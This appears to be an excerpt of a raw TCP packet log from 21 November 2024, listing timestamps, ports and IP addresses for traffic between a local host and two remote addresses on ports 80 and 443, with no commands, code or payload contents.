                                                                                                                                                                                                            Nov 21, 2024 15:17:37.714977980 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.715020895 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.715748072 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.715787888 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.715801001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.715816975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.716613054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.716654062 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.716969967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.716984987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.717000961 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.717009068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.717040062 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.717808008 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.717967987 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.717983007 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.718023062 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.718628883 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.718673944 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.718694925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.718709946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.719512939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.719558954 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.719589949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.719604969 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.719623089 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.720357895 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.720403910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.720419884 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.720434904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.721251965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.721298933 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.721303940 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.721318960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.721337080 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.722117901 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.722167969 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.722182989 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.722214937 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.722239971 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.722966909 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.723048925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.723062992 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.723092079 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.723890066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.723938942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.723964930 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.723987103 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.724020958 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.904661894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.904717922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.904736996 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.904791117 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.905153036 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.905184031 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.905199051 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.905216932 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.905237913 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.905911922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.906126976 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.906177998 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.906207085 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.906250954 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.906404018 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907064915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907083035 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907099009 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907126904 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907859087 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907887936 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907902002 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907917976 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.907938957 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.908730984 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.908776045 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.908791065 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.908824921 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.909621000 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.909636974 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.909667015 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.909701109 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.909739971 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.910465956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.910501003 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.910516977 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.910562992 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.911432028 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.911448956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.911464930 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.911498070 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.911521912 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.912214994 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.912278891 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.912296057 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.912336111 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913098097 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913129091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913146019 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913173914 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913193941 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913918972 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913975954 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.913991928 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.914036989 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.914793015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.914841890 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.914856911 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.914859056 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.914890051 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.915689945 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.915807962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.915822983 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.915853977 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.916542053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.916573048 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.916588068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.916589022 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.916661978 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.917404890 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.917437077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.917452097 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.917491913 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.918282032 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.918311119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.918325901 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.918332100 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.918369055 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.919127941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.919163942 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.919178963 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.919219971 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920011997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920058966 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920085907 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920101881 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920141935 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920890093 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920923948 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920939922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.920969009 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.921768904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.921819925 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.921830893 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.921835899 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.921885967 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.922619104 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.922653913 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.922668934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.922712088 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.923477888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.923512936 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.923527956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.923549891 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.923574924 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.924351931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.924406052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.924424887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.924468994 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.925209045 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.925263882 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.925268888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.925285101 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.925326109 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.926070929 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.926085949 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.926148891 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.926163912 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.926961899 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.927167892 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.927252054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.927268982 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.927284956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.927329063 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.928119898 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.928136110 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.928180933 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.928214073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.928251028 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.928965092 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929037094 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929053068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929092884 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929805040 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929892063 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929903984 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929919958 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.929975033 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.930726051 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.930775881 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.930793047 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.930838108 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.931588888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.931638956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.931654930 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.931658983 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.931711912 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.932414055 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.932476997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.932492018 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.932564020 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.933285952 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.933351994 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.933352947 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.933368921 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.933453083 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.934326887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.934362888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.934379101 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.934411049 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.936696053 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.936789036 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.936841965 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.937284946 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.937302113 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.937314034 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.937319994 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.938112020 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.938582897 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.938601971 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.939027071 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.939032078 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.940380096 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.940423012 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.940515041 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.940651894 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.940665960 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.946640015 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.946973085 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.946994066 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.947470903 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.947479963 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.962752104 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.962913990 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.962963104 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.963037968 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.963053942 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.963094950 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.963100910 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.965586901 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.965620041 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.965689898 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.965818882 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.965831041 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:37.983879089 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.100723028 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.101138115 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.101161957 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.101614952 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.101624012 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.115495920 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.115529060 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.115545034 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.115605116 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.115953922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.115998030 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.116005898 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.116024971 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.116420984 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.116811037 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.116947889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.116964102 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.117016077 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.117646933 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.117688894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.117692947 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.117705107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.118166924 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.118585110 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.118648052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.118664980 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.118689060 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.119376898 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.119409084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.119420052 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.119425058 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.119574070 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.120321035 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.120383978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.120404959 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.120498896 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.121138096 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.121171951 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:38.121190071 CET8049778185.215.113.16192.168.2.6
